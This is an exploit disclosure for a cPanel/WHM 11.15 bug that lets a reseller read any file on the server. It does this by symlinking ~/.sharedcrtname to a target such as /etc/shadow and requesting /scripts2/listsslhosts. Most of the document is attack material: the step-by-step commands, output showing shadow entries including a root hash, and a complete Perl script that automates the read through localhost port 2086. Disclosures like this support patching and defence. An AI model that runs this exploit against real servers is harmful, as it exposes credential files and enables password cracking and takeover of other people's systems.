cPanel 11.15.0-RELEASE_17853 - Resellers could view any file on the box



DESCRIPTION


Resellers could symlink ~/.sharedcrtname to any file on the box, then view the contents of that file via "Manage SSL Hosts" in WHM. If that option was not available to the reseller in WHM, they could still send the request to the server anyway, which would be honored.


Step 1:

[user@host ~]$ ln -s /etc/shadow /home/reseller_username/.sharedcrtname


Step 2:

GET /scripts2/listsslhosts HTTP/1.0



IMPACT


Resellers could view any file on the box.


[user@host ~]$ ./11.15.0-RELEASE_17853-view_any_file.pl
root:$1$BxAWmn63$J4Iyx.3Ki6wtUo1NS7A2e/:14457:0:99999:7:::
bin:*:14322:0:99999:7:::
daemon:*:14322:0:99999:7:::
adm:*:14322:0:99999:7:::
lp:*:14322:0:99999:7:::
sync:*:14322:0:99999:7:::
shutdown:*:14322:0:99999:7:::
halt:*:14322:0:99999:7:::
mail:*:14322:0:99999:7:::
news:*:14322:0:99999:7:::
...


#!/usr/bin/perl

#########################################################
#
# 11.15.0-RELEASE_17853
#
# View the entire contents of a file, such as /etc/shadow
# Works via /home/user/.sharedcrtname
#
#########################################################

use strict;
use warnings;
use MIME::Base64;
use IO::Socket::INET;

my $username = '';
my $password = '';

my $creds = encode_base64("$username:$password");

my $sharedcrtname    = "/home/$ENV{'USER'}/.sharedcrtname";
my $sharedcrtnamebak = $sharedcrtname . 'bak';
my $etcshadow        = '/etc/shadow';

if ( -e $sharedcrtname ) {
    rename $sharedcrtname, $sharedcrtnamebak;
}

symlink $etcshadow, $sharedcrtname;

my $request = "GET /scripts2/listsslhosts HTTP/1.0\r\n";
$request   .= "Authorization: Basic $creds\r\n\r\n";

my $sock = IO::Socket::INET->new(
    PeerAddr => '127.0.0.1',
    PeerPort => '2086',
    Proto    => 'tcp',
    Timeout  => '3',
) or die "Unable to connect to localhost on port 2086\n";

print $sock $request;
read $sock, my $buffer, 100_000;
close $sock;

my @buffer = split ( /\n/, $buffer );
for my $line ( @buffer )
{
    if ( $line =~ /:::/ )
    {
        $line =~ s/.*<b>//g;
        print "$line\n";
    }
}

if ( -e $sharedcrtnamebak ) {
    rename $sharedcrtnamebak, $sharedcrtname;
}